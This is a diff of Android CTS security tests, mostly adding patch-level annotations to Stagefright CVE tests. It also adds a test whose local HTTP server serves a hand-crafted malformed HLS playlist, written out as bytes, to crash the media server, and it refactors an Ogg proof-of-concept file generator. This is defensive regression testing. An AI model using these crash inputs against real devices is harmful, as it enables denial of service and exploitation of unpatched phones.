+ parcelledDataField.setAccessible(true);
+ parcelledDataField.set(bundle, data);
+ return bundle;
+ }
+
+ private void sendBundleToSystem(Bundle theBundle) throws Exception {
+ Context.class
+ .getMethod("sendBroadcast",
+ Intent.class,
+ String.class,
+ Bundle.class)
+ .invoke(getContext(), new Intent("DUMMY_BROADCAST"), null, theBundle);
+ }
+}
diff --git a/tests/tests/security/src/android/security/cts/PutOverflowTest.java b/tests/tests/security/src/android/security/cts/PutOverflowTest.java
index 9755efa..6f7e8da 100644
--- a/tests/tests/security/src/android/security/cts/PutOverflowTest.java
+++ b/tests/tests/security/src/android/security/cts/PutOverflowTest.java
@@ -22,6 +22,7 @@
@SecurityTest
public class PutOverflowTest extends AndroidTestCase {
+ @SecurityTest(minPatchLevel = "2015-02")
public void testCrash() throws Exception {
try {
Class<?> keystoreClass = Class.forName("android.security.KeyStore");
diff --git a/tests/tests/security/src/android/security/cts/SSLConscryptPlainTextExposureTest.java b/tests/tests/security/src/android/security/cts/SSLConscryptPlainTextExposureTest.java
index 8f6477e..0e698f8 100644
--- a/tests/tests/security/src/android/security/cts/SSLConscryptPlainTextExposureTest.java
+++ b/tests/tests/security/src/android/security/cts/SSLConscryptPlainTextExposureTest.java
@@ -64,6 +64,7 @@
public static String output = "";
private final String pattern = ".*PLAIN TEXT EXPOSED.*";
+ @SecurityTest(minPatchLevel = "2018-05")
public void test_android_CVE_2017_13309() {
context = getInstrumentation().getContext();
diff --git a/tests/tests/security/src/android/security/cts/StagefrightTest.java b/tests/tests/security/src/android/security/cts/StagefrightTest.java
index 42aabed..784ce59 100644
--- a/tests/tests/security/src/android/security/cts/StagefrightTest.java
+++ b/tests/tests/security/src/android/security/cts/StagefrightTest.java
@@ -54,6 +54,10 @@
import java.net.URL;
import java.nio.ByteBuffer;
import java.io.FileOutputStream;
+import java.io.OutputStream;
+import java.io.InputStream;
+import java.net.Socket;
+import java.net.ServerSocket;
import java.io.File;
import java.util.ArrayList;
import java.util.HashMap;
@@ -81,169 +85,172 @@
before any existing test methods
***********************************************************/
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-07")
public void testStagefright_bug_36725407() throws Exception {
doStagefrightTest(R.raw.bug_36725407);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2016-08")
public void testStagefright_cve_2016_3829() throws Exception {
doStagefrightTest(R.raw.cve_2016_3829);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-06")
public void testStagefright_cve_2017_0643() throws Exception {
doStagefrightTest(R.raw.cve_2017_0643);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-08")
public void testStagefright_cve_2017_0728() throws Exception {
doStagefrightTest(R.raw.cve_2017_0728);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-10")
public void testStagefright_bug_62187433() throws Exception {
doStagefrightTest(R.raw.bug_62187433);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-09")
public void testStagefrightANR_bug_62673844() throws Exception {
doStagefrightTestANR(R.raw.bug_62673844);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-09")
public void testStagefright_bug_37079296() throws Exception {
doStagefrightTest(R.raw.bug_37079296);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-09")
public void testStagefright_bug_38342499() throws Exception {
doStagefrightTest(R.raw.bug_38342499);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2015-10")
public void testStagefright_bug_22771132() throws Exception {
doStagefrightTest(R.raw.bug_22771132);
}
+ @SecurityTest(minPatchLevel = "2015-10")
public void testStagefright_bug_21443020() throws Exception {
doStagefrightTest(R.raw.bug_21443020_webm);
}
+ @SecurityTest(minPatchLevel = "2018-03")
public void testStagefright_bug_34360591() throws Exception {
doStagefrightTest(R.raw.bug_34360591);
}
+ @SecurityTest(minPatchLevel = "2017-06")
public void testStagefright_bug_35763994() throws Exception {
doStagefrightTest(R.raw.bug_35763994);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-03")
public void testStagefright_bug_33137046() throws Exception {
doStagefrightTest(R.raw.bug_33137046);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-07")
public void testStagefright_cve_2016_2507() throws Exception {
doStagefrightTest(R.raw.cve_2016_2507);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-03")
public void testStagefright_bug_31647370() throws Exception {
doStagefrightTest(R.raw.bug_31647370);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-01")
public void testStagefright_bug_32577290() throws Exception {
doStagefrightTest(R.raw.bug_32577290);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-07")
public void testStagefright_cve_2015_1538_1() throws Exception {
doStagefrightTest(R.raw.cve_2015_1538_1);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-07")
public void testStagefright_cve_2015_1538_2() throws Exception {
doStagefrightTest(R.raw.cve_2015_1538_2);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-07")
public void testStagefright_cve_2015_1538_3() throws Exception {
doStagefrightTest(R.raw.cve_2015_1538_3);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-07")
public void testStagefright_cve_2015_1538_4() throws Exception {
doStagefrightTest(R.raw.cve_2015_1538_4);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-07")
public void testStagefright_cve_2015_1539() throws Exception {
doStagefrightTest(R.raw.cve_2015_1539);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2015-01")
public void testStagefright_cve_2015_3824() throws Exception {
doStagefrightTest(R.raw.cve_2015_3824);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2015-01")
public void testStagefright_cve_2015_3826() throws Exception {
doStagefrightTest(R.raw.cve_2015_3826);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2015-01")
public void testStagefright_cve_2015_3827() throws Exception {
doStagefrightTest(R.raw.cve_2015_3827);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2015-01")
public void testStagefright_cve_2015_3828() throws Exception {
doStagefrightTest(R.raw.cve_2015_3828);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2015-01")
public void testStagefright_cve_2015_3829() throws Exception {
doStagefrightTest(R.raw.cve_2015_3829);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2015-01")
public void testStagefright_cve_2015_3836() throws Exception {
doStagefrightTest(R.raw.cve_2015_3836);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2015-01")
public void testStagefright_cve_2015_3864() throws Exception {
doStagefrightTest(R.raw.cve_2015_3864);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2015-01")
public void testStagefright_cve_2015_3864_b23034759() throws Exception {
doStagefrightTest(R.raw.cve_2015_3864_b23034759);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2015-10")
public void testStagefright_cve_2015_6598() throws Exception {
doStagefrightTest(R.raw.cve_2015_6598);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2016-12")
public void testStagefright_cve_2016_6766() throws Exception {
doStagefrightTest(R.raw.cve_2016_6766);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2016-04")
public void testStagefright_bug_26366256() throws Exception {
doStagefrightTest(R.raw.bug_26366256);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-02")
public void testStagefright_cve_2016_2429_b_27211885() throws Exception {
doStagefrightTest(R.raw.cve_2016_2429_b_27211885);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-08")
public void testStagefright_bug_34031018() throws Exception {
doStagefrightTest(R.raw.bug_34031018_32bit);
doStagefrightTest(R.raw.bug_34031018_64bit);
@@ -254,32 +261,32 @@
before any existing test methods
***********************************************************/
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2018-01")
public void testStagefright_bug_65123471() throws Exception {
doStagefrightTest(R.raw.bug_65123471);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2018-04")
public void testStagefright_bug_72165027() throws Exception {
doStagefrightTest(R.raw.bug_72165027);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2018-06")
public void testStagefright_bug_65483665() throws Exception {
doStagefrightTest(R.raw.bug_65483665);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2018-01")
public void testStagefright_cve_2017_0852_b_62815506() throws Exception {
doStagefrightTest(R.raw.cve_2017_0852_b_62815506);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2018-02")
public void testStagefright_cve_2017_13229() throws Exception {
doStagefrightTest(R.raw.cve_2017_13229);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-09")
public void testStagefright_cve_2017_0763() throws Exception {
doStagefrightTest(R.raw.cve_2017_0763);
}
@@ -289,344 +296,342 @@
before any existing test methods
***********************************************************/
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2018-06")
public void testBug_73965890() throws Exception {
int[] frameSizes = getFrameSizes(R.raw.bug_73965890_framelen);
doStagefrightTestRawBlob(R.raw.bug_73965890_hevc, "video/hevc", 320, 240, frameSizes);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2016-10")
public void testStagefright_cve_2016_3920() throws Exception {
doStagefrightTest(R.raw.cve_2016_3920);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2018-06")
public void testStagefright_bug_68953854() throws Exception {
doStagefrightTest(R.raw.bug_68953854, 1 * 60 * 1000);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-09")
public void testStagefright_bug_38448381() throws Exception {
doStagefrightTest(R.raw.bug_38448381);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2016-08")
public void testStagefright_cve_2016_3821() throws Exception {
doStagefrightTest(R.raw.cve_2016_3821);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2018-04")
public void testStagefright_bug_70897454() throws Exception {
doStagefrightTestRawBlob(R.raw.b70897454_avc, "video/avc", 320, 420);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2016-07")
public void testStagefright_cve_2016_3742_b_28165659() throws Exception {
doStagefrightTest(R.raw.cve_2016_3742_b_28165659);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-05")
public void testStagefright_bug_35039946() throws Exception {
doStagefrightTestRawBlob(R.raw.bug_35039946_hevc, "video/hevc", 320, 420);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-09")
public void testStagefright_bug_38115076() throws Exception {
doStagefrightTest(R.raw.bug_38115076);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-05")
public void testStagefright_bug_34618607() throws Exception {
doStagefrightTest(R.raw.bug_34618607);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2018-02")
public void testStagefright_bug_69478425() throws Exception {
doStagefrightTest(R.raw.bug_69478425);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2018-01")
public void testStagefright_bug_65735716() throws Exception {
doStagefrightTestRawBlob(R.raw.bug_65735716_avc, "video/avc", 320, 240);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-12")
public void testStagefright_bug_65717533() throws Exception {
doStagefrightTest(R.raw.bug_65717533_header_corrupt);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-08")
public void testStagefright_bug_38239864() throws Exception {
doStagefrightTest(R.raw.bug_38239864, (4 * 60 * 1000));
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-05")
public void testStagefright_cve_2017_0600() throws Exception {
doStagefrightTest(R.raw.cve_2017_0600);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-08")
public void testBug_38014992() throws Exception {
int[] frameSizes = getFrameSizes(R.raw.bug_38014992_framelen);
doStagefrightTestRawBlob(R.raw.bug_38014992_avc, "video/avc", 640, 480, frameSizes);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-07")
public void testBug_35584425() throws Exception {
int[] frameSizes = getFrameSizes(R.raw.bug_35584425_framelen);
doStagefrightTestRawBlob(R.raw.bug_35584425_avc, "video/avc", 352, 288, frameSizes);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2016-11")
public void testBug_31092462() throws Exception {
int[] frameSizes = getFrameSizes(R.raw.bug_31092462_framelen);
doStagefrightTestRawBlob(R.raw.bug_31092462_avc, "video/avc", 1280, 1024, frameSizes);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-04")
public void testBug_34097866() throws Exception {
int[] frameSizes = getFrameSizes(R.raw.bug_34097866_frame_len);
doStagefrightTestRawBlob(R.raw.bug_34097866_avc, "video/avc", 352, 288, frameSizes);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-03")
public void testBug_33862021() throws Exception {
int[] frameSizes = getFrameSizes(R.raw.bug_33862021_frame_len);
doStagefrightTestRawBlob(R.raw.bug_33862021_hevc, "video/hevc", 160, 96, frameSizes);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-03")
public void testBug_33387820() throws Exception {
int[] frameSizes = {45, 3202, 430, 2526};
doStagefrightTestRawBlob(R.raw.bug_33387820_avc, "video/avc", 320, 240, frameSizes);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-07")
public void testBug_37008096() throws Exception {
int[] frameSizes = {245, 12, 33, 140, 164};
doStagefrightTestRawBlob(R.raw.bug_37008096_avc, "video/avc", 320, 240, frameSizes);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-07")
public void testStagefright_bug_34231163() throws Exception {
int[] frameSizes = {22, 357, 217, 293, 175};
doStagefrightTestRawBlob(R.raw.bug_34231163_mpeg2, "video/mpeg2", 320, 240, frameSizes);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-04")
public void testStagefright_bug_33933140() throws Exception {
int[] frameSizes = getFrameSizes(R.raw.bug_33933140_framelen);
doStagefrightTestRawBlob(R.raw.bug_33933140_avc, "video/avc", 320, 240, frameSizes);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-04")
public void testStagefright_bug_34097915() throws Exception {
int[] frameSizes = {4140, 593, 0, 15495};
doStagefrightTestRawBlob(R.raw.bug_34097915_avc, "video/avc", 320, 240, frameSizes);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-03")
public void testStagefright_bug_34097213() throws Exception {
int[] frameSizes = {2571, 210, 33858};
doStagefrightTestRawBlob(R.raw.bug_34097213_avc, "video/avc", 320, 240, frameSizes);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2016-08")
public void testBug_28816956() throws Exception {
int[] frameSizes = getFrameSizes(R.raw.bug_28816956_framelen);
doStagefrightTestRawBlob(R.raw.bug_28816956_hevc, "video/hevc", 352, 288, frameSizes);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-03")
public void testBug_33818500() throws Exception {
int[] frameSizes = getFrameSizes(R.raw.bug_33818500_framelen);
doStagefrightTestRawBlob(R.raw.bug_33818500_avc, "video/avc", 64, 32, frameSizes);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2018-01")
public void testBug_64784973() throws Exception {
int[] frameSizes = getFrameSizes(R.raw.bug_64784973_framelen);
doStagefrightTestRawBlob(R.raw.bug_64784973_hevc, "video/hevc", 1280, 720, frameSizes);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-07")
public void testBug_34231231() throws Exception {
int[] frameSizes = getFrameSizes(R.raw.bug_34231231_framelen);
doStagefrightTestRawBlob(R.raw.bug_34231231_mpeg2, "video/mpeg2", 352, 288, frameSizes);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-10")
public void testBug_63045918() throws Exception {
int[] frameSizes = getFrameSizes(R.raw.bug_63045918_framelen);
doStagefrightTestRawBlob(R.raw.bug_63045918_hevc, "video/hevc", 352, 288, frameSizes);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-03")
public void testBug_33298089() throws Exception {
int[] frameSizes = {3247, 430, 221, 2305};
doStagefrightTestRawBlob(R.raw.bug_33298089_avc, "video/avc", 32, 64, frameSizes);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-05")
public void testStagefright_cve_2017_0599() throws Exception {
doStagefrightTest(R.raw.cve_2017_0599);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-09")
public void testStagefright_bug_36492741() throws Exception {
doStagefrightTest(R.raw.bug_36492741);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-08")
public void testStagefright_bug_38487564() throws Exception {
doStagefrightTest(R.raw.bug_38487564, (4 * 60 * 1000));
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-09")
public void testStagefright_bug_37237396() throws Exception {
doStagefrightTest(R.raw.bug_37237396);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-09")
public void testStagefright_cve_2016_0842() throws Exception {
doStagefrightTest(R.raw.cve_2016_0842);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-11")
public void testStagefright_bug_63121644() throws Exception {
doStagefrightTest(R.raw.bug_63121644);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-09")
public void testStagefright_cve_2016_6712() throws Exception {
doStagefrightTest(R.raw.cve_2016_6712);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-04")
public void testStagefright_bug_34097231() throws Exception {
doStagefrightTestRawBlob(R.raw.bug_34097231_avc, "video/avc", 320, 240);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-05")
public void testStagefright_bug_34097672() throws Exception {
doStagefrightTest(R.raw.bug_34097672);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-03")
public void testStagefright_bug_33751193() throws Exception {
doStagefrightTestRawBlob(R.raw.bug_33751193_avc, "video/avc", 320, 240);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-07")
public void testBug_36993291() throws Exception {
doStagefrightTestRawBlob(R.raw.bug_36993291_avc, "video/avc", 320, 240);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-06")
public void testStagefright_bug_33818508() throws Exception {
doStagefrightTest(R.raw.bug_33818508);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-08")
public void testStagefright_bug_32873375() throws Exception {
doStagefrightTest(R.raw.bug_32873375);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2016-03")
public void testStagefright_bug_25765591() throws Exception {
doStagefrightTest(R.raw.bug_25765591);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-09")
public void testStagefright_bug_62673179() throws Exception {
doStagefrightTest(R.raw.bug_62673179_ts, (4 * 60 * 1000));
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2018-03")
public void testStagefright_bug_69269702() throws Exception {
doStagefrightTest(R.raw.bug_69269702);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2015-10")
public void testStagefright_cve_2015_3867() throws Exception {
doStagefrightTest(R.raw.cve_2015_3867);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2018-01")
public void testStagefright_bug_65398821() throws Exception {
doStagefrightTest(R.raw.bug_65398821, ( 4 * 60 * 1000 ) );
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2015-10")
public void testStagefright_cve_2015_3869() throws Exception {
doStagefrightTest(R.raw.cve_2015_3869);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2016-03")
public void testStagefright_bug_23452792() throws Exception {
doStagefrightTest(R.raw.bug_23452792);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2016-08")
public void testStagefright_cve_2016_3820() throws Exception {
doStagefrightTest(R.raw.cve_2016_3820);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2016-07")
public void testStagefright_cve_2016_3741() throws Exception {
doStagefrightTest(R.raw.cve_2016_3741);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2016-07")
public void testStagefright_cve_2016_2506() throws Exception {
doStagefrightTest(R.raw.cve_2016_2506);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2016-06")
public void testStagefright_cve_2016_2428() throws Exception {
doStagefrightTest(R.raw.cve_2016_2428);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2016-07")
public void testStagefright_cve_2016_3756() throws Exception {
doStagefrightTest(R.raw.cve_2016_3756);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-07")
public void testStagefright_bug_36592202() throws Exception {
Resources resources = getInstrumentation().getContext().getResources();
AssetFileDescriptor fd = resources.openRawResourceFd(R.raw.bug_36592202);
- int page_size = 25627;
- byte [] blob = new byte[page_size];
-
- // 127 bytes read and 25500 zeros constitute one Ogg page
+ final int oggPageSize = 25627;
+ byte [] blob = new byte[oggPageSize];
+ // 127 bytes read and 25500 zeros constitute one Ogg page
FileInputStream fis = fd.createInputStream();
int numRead = fis.read(blob);
fis.close();
-
// Creating temp file
final File tempFile = File.createTempFile("poc_tmp", ".ogg", null);
-
try {
final FileOutputStream tempFos = new FileOutputStream(tempFile.getAbsolutePath());
int bytesWritten = 0;
- // Repeat data till size is ~1 GB
- for (int i = 0; i < 50000; i++) {
+ final long oggPagesRequired = 50000;
+ long oggPagesAvailable = tempFile.getUsableSpace() / oggPageSize;
+ long numOggPages = Math.min(oggPagesRequired, oggPagesAvailable);
+ // Repeat data for specified number of pages
+ for (int i = 0; i < numOggPages; i++) {
tempFos.write(blob);
- bytesWritten += page_size;
+ bytesWritten += oggPageSize;
}
tempFos.close();
-
final int fileSize = bytesWritten;
- int timeout = (10 * 60 * 1000);
-
+ final int timeout = (10 * 60 * 1000);
runWithTimeout(new Runnable() {
@Override
public void run() {
try {
doStagefrightTestMediaCodec(tempFile.getAbsolutePath());
- } catch (Exception | AssertionError e) {
+ } catch (Exception | AssertionError e) {
if (!tempFile.delete()) {
Log.e(TAG, "Failed to delete temporary PoC file");
}
@@ -643,131 +648,137 @@
}
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2016-11")
public void testStagefright_bug_30822755() throws Exception {
doStagefrightTest(R.raw.bug_30822755);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-06")
public void testStagefright_bug_32322258() throws Exception {
doStagefrightTest(R.raw.bug_32322258);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2015-10")
public void testStagefright_cve_2015_3873_b_23248776() throws Exception {
doStagefrightTest(R.raw.cve_2015_3873_b_23248776);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-06")
public void testStagefright_bug_35472997() throws Exception {
doStagefrightTest(R.raw.bug_35472997);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2015-10")
public void testStagefright_cve_2015_3873_b_20718524() throws Exception {
doStagefrightTest(R.raw.cve_2015_3873_b_20718524);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-07")
public void testStagefright_bug_34896431() throws Exception {
doStagefrightTest(R.raw.bug_34896431);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-04")
public void testBug_33641588() throws Exception {
doStagefrightTestRawBlob(R.raw.bug_33641588_avc, "video/avc", 320, 240);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2015-10")
public void testStagefright_cve_2015_3862_b_22954006() throws Exception {
doStagefrightTest(R.raw.cve_2015_3862_b_22954006);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2015-10")
public void testStagefright_cve_2015_3867_b_23213430() throws Exception {
doStagefrightTest(R.raw.cve_2015_3867_b_23213430);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2015-10")
public void testStagefright_cve_2015_3873_b_21814993() throws Exception {
doStagefrightTest(R.raw.cve_2015_3873_b_21814993);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2016-04")
public void testStagefright_bug_25812590() throws Exception {
doStagefrightTest(R.raw.bug_25812590);
}
+ @SecurityTest(minPatchLevel = "2015-10")
public void testStagefright_cve_2015_6600() throws Exception {
doStagefrightTest(R.raw.cve_2015_6600);
}
+ @SecurityTest(minPatchLevel = "2015-10")
public void testStagefright_cve_2015_6603() throws Exception {
doStagefrightTest(R.raw.cve_2015_6603);
}
+ @SecurityTest(minPatchLevel = "2015-10")
public void testStagefright_cve_2015_6604() throws Exception {
doStagefrightTest(R.raw.cve_2015_6604);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2015-12")
public void testStagefright_bug_24157524() throws Exception {
- doStagefrightTest(R.raw.bug_24157524);
+ doStagefrightTestMediaCodec(R.raw.bug_24157524);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2015-10")
public void testStagefright_cve_2015_3871() throws Exception {
doStagefrightTest(R.raw.cve_2015_3871);
}
+ @SecurityTest(minPatchLevel = "2016-04")
public void testStagefright_bug_26070014() throws Exception {
doStagefrightTest(R.raw.bug_26070014);
}
+ @SecurityTest(minPatchLevel = "2017-03")
public void testStagefright_bug_32915871() throws Exception {
doStagefrightTest(R.raw.bug_32915871);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2016-07")
public void testStagefright_bug_28333006() throws Exception {
doStagefrightTest(R.raw.bug_28333006);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2015-11")
public void testStagefright_bug_14388161() throws Exception {
doStagefrightTestMediaPlayer(R.raw.bug_14388161);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2016-07")
public void testStagefright_cve_2016_3755() throws Exception {
doStagefrightTest(R.raw.cve_2016_3755);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2016-09")
public void testStagefright_cve_2016_3878_b_29493002() throws Exception {
doStagefrightTest(R.raw.cve_2016_3878_b_29493002);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-08")
public void testBug_36819262() throws Exception {
doStagefrightTestRawBlob(R.raw.bug_36819262_mpeg2, "video/mpeg2", 640, 480);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2015-11")
public void testStagefright_cve_2015_6608_b_23680780() throws Exception {
doStagefrightTest(R.raw.cve_2015_6608_b_23680780);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-09")
public void testStagefright_bug_36715268() throws Exception {
doStagefrightTest(R.raw.bug_36715268);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2016-06")
public void testStagefright_bug_27855419_CVE_2016_2463() throws Exception {
doStagefrightTest(R.raw.bug_27855419);
}
+ @SecurityTest(minPatchLevel = "2015-11")
public void testStagefright_bug_19779574() throws Exception {
doStagefrightTest(R.raw.bug_19779574);
}
@@ -777,42 +788,127 @@
before any existing test methods
***********************************************************/
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2018-02")
+ public void testStagefright_bug_68342866() throws Exception {
+ Thread server = new Thread() {
+ @Override
+ public void run() {
+ try (ServerSocket serverSocket = new ServerSocket(8080);
+ Socket conn = serverSocket.accept()) {
+ OutputStream outputstream = conn.getOutputStream();
+ InputStream inputStream = conn.getInputStream();
+ byte input[] = new byte[65536];
+ inputStream.read(input, 0, 65536);
+ String inputStr = new String(input);
+ if (inputStr.contains("bug_68342866.m3u8")) {
+ byte http[] = ("HTTP/1.0 200 OK\r\nContent-Type: application/x-mpegURL\r\n\r\n")
+ .getBytes();
+ byte playlist[] = new byte[] { 0x23, 0x45, 0x58, 0x54,
+ 0x4D, 0x33, 0x55, 0x0A, 0x23, 0x45, 0x58, 0x54,
+ 0x2D, 0x58, 0x2D, 0x53, 0x54, 0x52, 0x45, 0x41,
+ 0x4D, 0x2D, 0x49, 0x4E, 0x46, 0x46, 0x43, 0x23,
+ 0x45, 0x3A, 0x54, 0x42, 0x00, 0x00, 0x00, 0x0A,
+ 0x00, 0x00, 0x00, 0x00, 0x00, (byte) 0xFF,
+ (byte) 0xFF, (byte) 0xFF, (byte) 0xFF,
+ (byte) 0xFF, (byte) 0xFF, 0x3F, 0x2C, 0x4E,
+ 0x46, 0x00, 0x00 };
+ outputstream.write(http);
+ outputstream.write(playlist);
+ }
+ } catch (IOException e) {
+ }
+ }
+ };
+ server.start();
+ String uri = "http://127.0.0.1:8080/bug_68342866.m3u8";
+ final MediaPlayerCrashListener mpcl = new MediaPlayerCrashListener();
+ LooperThread t = new LooperThread(new Runnable() {
+ @Override
+ public void run() {
+ MediaPlayer mp = new MediaPlayer();
+ mp.setOnErrorListener(mpcl);
+ mp.setOnPreparedListener(mpcl);
+ mp.setOnCompletionListener(mpcl);
+ Surface surface = getDummySurface();
+ mp.setSurface(surface);
+ AssetFileDescriptor fd = null;
+ try {
+ mp.setDataSource(uri);
+ mp.prepareAsync();
+ } catch (IOException e) {
+ Log.e(TAG, e.toString());
+ } finally {
+ closeQuietly(fd);
+ }
+ Looper.loop();
+ mp.release();
+ }
+ });
+ t.start();
+ assertFalse("Device *IS* vulnerable to BUG-68342866",
+ mpcl.waitForError() == MediaPlayer.MEDIA_ERROR_SERVER_DIED);
+ t.stopLooper();
+ t.join();
+ server.join();
+ }
+
+ @SecurityTest(minPatchLevel = "2018-05")
+ public void testStagefright_bug_74114680() throws Exception {
+ doStagefrightTest(R.raw.bug_74114680_ts, (10 * 60 * 1000));
+ }
+
+ @SecurityTest(minPatchLevel = "2018-03")
+ public void testStagefright_bug_70239507() throws Exception {
+ doStagefrightTestExtractorSeek(R.raw.bug_70239507,1311768465173141112L);
+ }
+
+ @SecurityTest(minPatchLevel = "2017-03")
+ public void testBug_33250932() throws Exception {
+ int[] frameSizes = {65, 11, 102, 414};
+ doStagefrightTestRawBlob(R.raw.bug_33250932_avc, "video/avc", 640, 480, frameSizes);
+ }
+
+ @SecurityTest(minPatchLevel = "2017-08")
+ public void testStagefright_bug_37430213() throws Exception {
+ doStagefrightTest(R.raw.bug_37430213);
+ }
+
